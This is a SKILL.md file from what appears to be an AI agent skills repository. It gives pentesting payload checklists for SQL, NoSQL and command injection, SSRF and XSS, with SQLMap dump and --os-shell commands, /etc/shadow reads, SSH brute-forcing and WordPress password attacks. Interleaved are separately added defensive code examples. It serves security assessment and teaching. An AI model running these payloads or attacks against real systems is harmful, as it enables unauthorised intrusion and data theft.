opencode-skill/skills/pentesting/SKILL.md
Kunthawat Greethong 7edf5bc4d0 feat: Import 35+ skills, merge duplicates, add openclaw installer
Major updates:
- Added 35+ new skills from awesome-opencode-skills and antigravity repos
- Merged SEO skills into seo-master
- Merged architecture skills into architecture
- Merged security skills into security-auditor and security-coder
- Merged testing skills into testing-master and testing-patterns
- Merged pentesting skills into pentesting
- Renamed website-creator to thai-frontend-dev
- Replaced skill-creator with github version
- Removed Chutes references (use MiniMax API instead)
- Added install-openclaw-skills.sh for cross-platform installation
- Updated .env.example with MiniMax API credentials
2026-03-26 11:37:39 +07:00


---
name: pentesting
description: |
  Penetration testing skill combining SQL injection, command injection, SSRF, HTML injection,
  SSH, and WordPress penetration testing. Use when performing security assessments.
---
# Penetration Testing
Comprehensive pentesting skill combining: SQL injection, command injection, SSRF, HTML injection, SSH, and specialized platform testing.
---
## Quick Reference
| Vulnerability | Use Section |
|--------------|-------------|
| SQL Injection | **SQL Injection** |
| Database enumeration | **SQLMap** |
| Command injection | **Command Injection** |
| SSRF | **SSRF Testing** |
| HTML injection | **HTML Injection** |
| SSH testing | **SSH Pentesting** |
| WordPress | **WordPress Testing** |
| Web3 | **Web3 Testing** |
---
## SQL Injection
### Types
1. **In-Band** - Data returned via same channel
2. **Blind** - No data returned, infer from behavior
3. **Time-Based** - Use delays to infer data
4. **Out-of-Band** - Data via alternative channel
### Testing Checklist
```bash
# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1#
' OR 1=1/*
```
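The payloads above only work because the query text is assembled from user input. The following example is added here (it is not part of the SKILL.md or the repository) and uses an in-memory SQLite table with a constructed `admin` row to show the vulnerable concatenation beside the parameterised form. SQLite honours `--` comments, so the `--` payloads from the checklist are the ones exercised; the MySQL-style `#` and `/*` variants would simply be syntax errors here.

```python
import sqlite3


def make_db():
    """Constructed sample database: one user row, not data from the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String concatenation: quote characters in the input become part of the SQL."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        # A syntax error is itself a sign that user input reached the SQL parser.
        return False


def safe_login(conn, username, password):
    """Bound parameters: the driver sends the values separately from the query text,
    so the input is only ever compared as a literal string."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def compare(username, password="wrong"):
    """Return (vulnerable_result, safe_result) for one credential pair."""
    conn = make_db()
    return (
        vulnerable_login(conn, username, password),
        safe_login(conn, username, password),
    )


if __name__ == "__main__":
    for payload in ("admin' --", "' OR 1=1--", "' OR '1'='1' --"):
        print(repr(payload), compare(payload))
```

Each checklist payload logs in against `vulnerable_login` with a wrong password and is rejected by `safe_login`; the legitimate credentials pass both. The same bound-parameter shape applies to every driver (`%s` placeholders for psycopg2/MySQLdb, `?` for SQLite and JDBC), and an ORM's raw-query escape hatch still needs it.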
### NoSQL Injection
```javascript
// MongoDB
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "function() { return true; }"}
```
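Those documents work against a login handler that passes the decoded JSON body straight into a MongoDB filter. The following validator is an added example (not code from the SKILL.md or the repository): it walks the decoded body, rejects any object key that starts with `$`, and then insists that the credential fields are plain strings, which is what a filter such as `{"username": u, "password": h}` needs. Field names and the `parse_login` helper are assumptions for the illustration.

```python
import json


def reject_operators(value, path="$"):
    """Recursively refuse any object whose key starts with '$' (a query operator)."""
    if isinstance(value, dict):
        for key, child in value.items():
            if isinstance(key, str) and key.startswith("$"):
                raise ValueError(f"operator {key!r} not allowed at {path}")
            reject_operators(child, f"{path}.{key}")
    elif isinstance(value, list):
        for index, child in enumerate(value):
            reject_operators(child, f"{path}[{index}]")


def parse_login(body):
    """Decode a JSON login body and return only string-typed credential fields.

    Type enforcement matters on its own: {"password": ["x"]} contains no '$' key
    but is still not a string and would change the meaning of the filter.
    """
    doc = json.loads(body)
    if not isinstance(doc, dict):
        raise ValueError("body must be a JSON object")
    reject_operators(doc)
    for field in ("username", "password"):
        if not isinstance(doc.get(field), str):
            raise ValueError(f"{field} must be a string")
    return {"username": doc["username"], "password": doc["password"]}


def is_accepted(body):
    """True if the body survives validation; used to exercise the payloads."""
    try:
        parse_login(body)
        return True
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return False


# Constructed request bodies carrying the four operator payloads from the list above.
OPERATOR_BODIES = [
    '{"username": "admin", "password": {"$ne": null}}',
    '{"username": {"$gt": ""}, "password": "x"}',
    '{"username": "admin", "password": {"$regex": ".*"}}',
    '{"username": "admin", "password": "x", "$where": "function() { return true; }"}',
]
```

The validated dictionary, not the raw body, is what goes into the database filter. Whether the driver is used directly or through an ODM, the same rule holds: user input may supply values, never keys.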
### SQLMap
```bash
# Basic scan
sqlmap -u "http://target.com/?id=1"
# POST request
sqlmap -u "http://target.com/login" --data="username=admin&password=test"
# Cookie injection
sqlmap -u "http://target.com/" --cookie="PHPSESSID=abc123"
# Enumerate databases
sqlmap -u "http://target.com/?id=1" --dbs
# Enumerate tables
sqlmap -u "http://target.com/?id=1" -D database_name --tables
# Dump data
sqlmap -u "http://target.com/?id=1" -D database_name -T users --dump
# Shell access
sqlmap -u "http://target.com/?id=1" --os-shell
```
### SQLMap Options
| Option | Description |
|--------|-------------|
| `--dbs` | List databases |
| `-D` | Specify database |
| `--tables` | List tables |
| `-T` | Specify table |
| `--dump` | Extract data |
| `--os-shell` | OS shell access |
| `--batch` | Non-interactive |
| `--risk=3` | High risk tests |
---
## Command Injection
### Testing Checklist
```bash
# Common payloads
; ls
| ls
& ls
&& ls
|| ls
`ls`
$(ls)
| cat /etc/passwd
; cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
# Blind command injection
& sleep 5 &
| sleep 5 &
; sleep 5 &
```
### Filter Bypass
```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
# No quotes
cat /etc/passwd
cat /etc/shadow
# Encoding
echo "Y2F0ICAvZXRjL3Bhc3N3ZA==" | base64 -d
```
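Every item in the two lists above relies on the application handing user text to a shell. The example below is added here (not code from the SKILL.md or the repository) and shows the two halves of the fix: validate the input against what it is supposed to be (here a hostname, using an assumed `ping` wrapper as the scenario), and pass it as its own `argv` element so no shell parses it. The `echo_argv` helper runs the Python interpreter itself as the child process so the demonstration works on any machine.

```python
import re
import subprocess
import sys

# RFC 1123 hostname labels: letters, digits and hyphens, no shell metacharacters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)


def vulnerable_command(host):
    """How the checklist payloads get in: the host is formatted into a shell string."""
    return {"args": f"ping -c 1 {host}", "shell": True}


def safe_command(host):
    """Allow-list the value and build an argv list; subprocess never starts a shell."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"not a valid hostname: {host!r}")
    return {"args": ["ping", "-c", "1", host], "shell": False}


def echo_argv(user_input):
    """Pass untrusted text as a single argv element and return what the child saw.

    Because there is no shell in the call chain, '; ls', '$(ls)' or '${IFS}' arrive
    as literal characters rather than as commands or expansions.
    """
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", user_input],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


# Constructed inputs taken from the payload lists above.
PAYLOADS = ["; ls", "| ls", "& sleep 5 &", "$(ls)", "`ls`",
            "cat${IFS}/etc/passwd", "{cat,/etc/passwd}"]


def rejected_by_validator(value):
    try:
        safe_command(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for p in PAYLOADS:
        print(repr(p), "rejected:", rejected_by_validator(p), "child saw:", repr(echo_argv(p)))
```

Either half alone is weaker than both: validation without the argv form still leaves the shell in the path, and the argv form without validation lets a value such as `-f` be read as an option by the child program.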
---
## SSRF (Server-Side Request Forgery)
### Testing Checklist
```bash
# Localhost
http://127.0.0.1
http://localhost
http://[::1]
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/
# Internal services
http://192.168.1.1
http://10.0.0.1
http://internal/
# File access
file:///etc/passwd
dict://localhost:11211/stats
sftp://localhost/
```
### SSRF Bypasses
```bash
# Alternate loopback address and hex-encoded IP
http://127.1.1.1
http://0x7f000001
# URL encoding
http://%31%32%37%2e%30%2e%30%2e%31
# IP shortening
http://2130706433
http://017700000001
# IPv6
http://[0:0:0:0:0:ffff:127.0.0.1]
```
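A URL allow-list that compares strings against `127.0.0.1` misses every entry in the bypass list. The validator below is added here (it is not code from the SKILL.md or the repository) and normalises the host the way the C library's `inet_aton` does (decimal, octal, hex and short dotted forms), unwraps IPv4-mapped IPv6, percent-decodes the host, restricts the scheme to `http`/`https`, and only then checks the address ranges. The `FAKE_DNS` table is constructed so the example runs offline; in production `resolve_host` uses `socket.getaddrinfo`.

```python
import ipaddress
import re
import socket
from urllib.parse import unquote, urlsplit

_PART_RE = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def _parse_part(part):
    if not _PART_RE.fullmatch(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)


def parse_ipv4_literal(host):
    """inet_aton semantics: 2130706433, 017700000001, 0x7f000001 and 127.1 are all 127.0.0.1."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    tail_bits = 8 * (5 - len(parts))  # the last part fills the remaining bytes
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 1 << tail_bits:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    return ipaddress.IPv4Address((value << tail_bits) | nums[-1])


def host_to_ips(host):
    """IP objects for a literal host, or None when the host is a DNS name."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        ip = parse_ipv4_literal(host)
        return [ip] if ip is not None else None


def ip_is_public(ip):
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # [::ffff:127.0.0.1] is still loopback
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_host(host):
    """Real resolver: every address the name maps to, IPv6 scope ids stripped."""
    try:
        return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror:
        return set()


# Constructed name table so the checks below run without network access.
FAKE_DNS = {
    "localhost": {"127.0.0.1"},
    "metadata.google.internal": {"169.254.169.254"},
    "internal": {"10.0.0.5"},
    "example.com": {"93.184.216.34"},
}


def fake_resolver(host):
    return FAKE_DNS.get(host, set())


def vetted_ips(url, resolver=resolve_host):
    """Return the addresses a fetcher may connect to, or raise ValueError.

    Connect to one of the returned addresses (sending the original name in the
    Host header); resolving again at connect time reopens the DNS-rebinding window.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):  # rejects file://, dict://, sftp://, gopher://
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("no host")
    host = unquote(host)  # %31%32%37%2e%30%2e%30%2e%31 -> 127.0.0.1
    ips = host_to_ips(host)
    if ips is None:
        ips = [ipaddress.ip_address(a) for a in resolver(host)]
        if not ips:
            raise ValueError(f"unresolvable host: {host!r}")
    for ip in ips:
        if not ip_is_public(ip):
            raise ValueError(f"{host!r} resolves to non-public address {ip}")
    return [str(ip) for ip in ips]


def is_safe_url(url, resolver=resolve_host):
    try:
        vetted_ips(url, resolver)
        return True
    except ValueError:
        return False
```

The ranges come from Python's `ipaddress` classification, which treats RFC 1918, loopback, link-local (including the 169.254.169.254 metadata endpoint) and the documentation nets as non-public. A redirect from a public URL has to be re-validated with the same function before it is followed.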
---
## HTML Injection
### Testing Checklist
```html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div style="background:url(javascript:alert(1))">
<marquee onstart=alert(1)>
```
### XSS Contexts
| Context | Payload |
|---------|---------|
| HTML body | `<script>alert(1)</script>` |
| Attribute | `" onmouseover=alert(1) x="` |
| URL | `javascript:alert(1)` |
| CSS | `style="x:expression(alert(1))"` |
| JavaScript | `';alert(1);//` |
---
## SSH Penetration Testing
### Testing Checklist
```bash
# SSH version detection
ssh -v target.com 2>&1 | grep "remote software version"
# Banner grabbing
nc target.com 22
# Authentication testing
hydra -l root -p password ssh://target.com
medusa -h target.com -u root -P passwords.txt -M ssh
# Key authentication
ssh -i key.pem root@target.com
# Weak keys check
./ssh-audit.py target.com
```
### SSH Audit
```bash
# Check SSH config
sshd -T
# Common issues
# - Weak ciphers
# - Old protocol
# - Root login allowed
# - Empty passwords
# - Default keys
```
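`sshd -T` prints the effective configuration one lowercase keyword per line, which makes the issues listed in the comments mechanically checkable. The following parser and audit are an added example (not code from the SKILL.md or the repository); `SAMPLE_SSHD_T` is constructed output in that format with several weak settings deliberately present, and the weak-algorithm markers are a reviewer's own short list, not an exhaustive one.

```python
# Constructed sample in the `sshd -T` output format (keyword, space, value).
SAMPLE_SSHD_T = """\
port 22
permitrootlogin yes
passwordauthentication yes
permitemptypasswords yes
pubkeyauthentication yes
maxauthtries 6
ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes256-cbc,3des-cbc
macs umac-128-etm@openssh.com,hmac-sha2-256,hmac-md5,hmac-sha1-96
kexalgorithms curve25519-sha256,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1
"""

WEAK_CIPHER_MARKERS = ("-cbc", "arcfour", "3des", "blowfish", "cast128")
WEAK_MAC_MARKERS = ("md5", "sha1", "ripemd", "-96", "umac-64")
ROOT_LOGIN_OK = ("no", "prohibit-password", "without-password")


def parse_sshd_t(text):
    """Turn `sshd -T` output into a {keyword: value} dict."""
    config = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        config[key.lower()] = value.strip()
    return config


def audit_sshd(config):
    """Return one finding string per weak setting; an empty list means clean."""
    findings = []
    root = config.get("permitrootlogin", "")
    if root not in ROOT_LOGIN_OK:
        findings.append(f"PermitRootLogin is {root!r}; set no or prohibit-password")
    if config.get("permitemptypasswords") == "yes":
        findings.append("PermitEmptyPasswords yes: accounts with empty passwords can log in")
    if config.get("passwordauthentication") == "yes":
        findings.append("PasswordAuthentication yes: password guessing surface; prefer keys")
    for cipher in filter(None, config.get("ciphers", "").split(",")):
        if any(m in cipher for m in WEAK_CIPHER_MARKERS):
            findings.append(f"weak cipher offered: {cipher}")
    for mac in filter(None, config.get("macs", "").split(",")):
        if any(m in mac for m in WEAK_MAC_MARKERS):
            findings.append(f"weak MAC offered: {mac}")
    for kex in filter(None, config.get("kexalgorithms", "").split(",")):
        if kex.endswith("sha1"):
            findings.append(f"weak key exchange offered: {kex}")
    return findings


HARDENED_SSHD_T = """\
permitrootlogin no
passwordauthentication no
permitemptypasswords no
ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
macs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
kexalgorithms curve25519-sha256,curve25519-sha256@libssh.org
"""

if __name__ == "__main__":
    for finding in audit_sshd(parse_sshd_t(SAMPLE_SSHD_T)):
        print("-", finding)
```

Run it against `sshd -T` captured on the host (`sudo sshd -T > sshd-effective.txt`) rather than against `sshd_config`, because `Match` blocks and compiled-in defaults only show up in the effective output.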
---
## WordPress Penetration Testing
### Enumeration
```bash
# Version detection
curl -s target.com/ | grep generator
# User enumeration
curl -s "target.com/wp-json/wp/v2/users/"
# Plugins
curl -s "target.com/wp-content/plugins/"
wpscan --url target.com --enumerate p
# Themes
wpscan --url target.com --enumerate t
# Users
wpscan --url target.com --enumerate u
```
### Common Vulnerabilities
```bash
# Plugin vulnerabilities
wpscan --url target.com --enumerate vp
# Password attacks
wpscan --url target.com --passwords wordlist.txt
# XMLRPC
curl -X POST "http://target.com/xmlrpc.php" -d "<?xml version='1.0'?><methodCall><methodName>wp.getUsers</methodName></methodCall>"
# Debug mode
curl -s "target.com/wp-config.php" | grep WP_DEBUG
```
### WPScan
```bash
# Full scan
wpscan --url target.com --enumerate all --api-token YOUR_TOKEN
# Vulnerability scan
wpscan --url target.com --enumerate vpt
# Password attack
wpscan --url target.com -P passwords.txt -U admin
```
---
## Web3 Testing
### Smart Contract Testing
```bash
# Slither - static analysis
slither contract.sol
# Mythril - security analysis
myth analyze contract.sol
# Echidna - fuzzing
echidna contract.sol
# Foundry - testing framework
forge test
```
### Common Vulnerabilities
| Vulnerability | Description |
|--------------|-------------|
| Reentrancy | Withdraw before state update |
| Integer overflow | Math errors in calculations |
| Access control | Missing modifiers |
| Front-running | Transaction ordering |
| Timestamp dependence | Block timestamp manipulation |
---
## OWASP Top 10 (2023)
| ID | Category |
|-----|----------|
| A01 | Broken Access Control |
| A02 | Cryptographic Failures |
| A03 | Injection |
| A04 | Insecure Design |
| A05 | Security Misconfiguration |
| A06 | Vulnerable Components |
| A07 | Auth Failures |
| A08 | Data Integrity Failures |
| A09 | Logging Failures |
| A10 | SSRF |
---
## Report Template
### Finding Details
```markdown
## [Finding Title]
**Severity:** Critical / High / Medium / Low / Informational
**CVSS Score:** [0.0-10.0]
**Description:**
[Detailed description of the vulnerability]
**Impact:**
[How this could be exploited and its business impact]
**Steps to Reproduce:**
1. [Step 1]
2. [Step 2]
3. [Step 3]
**Proof of Concept:**
[Code snippets, screenshots, etc.]
**Remediation:**
[How to fix the vulnerability]
**References:**
- [Link 1]
- [Link 2]
```
---
## Legal Disclaimer
> **WARNING:** Only test systems you have explicit written permission to test. Unauthorized penetration testing is illegal.
---
## Best Practices
1. **Get Written Permission** - Before any testing
2. **Define Scope** - Clear boundaries
3. **Document Everything** - Keep detailed notes
4. **Don't Exploit** - Demonstrate impact, don't destroy
5. **Report Responsibly** - Follow responsible disclosure
6. **Prioritize** - Focus on high-impact findings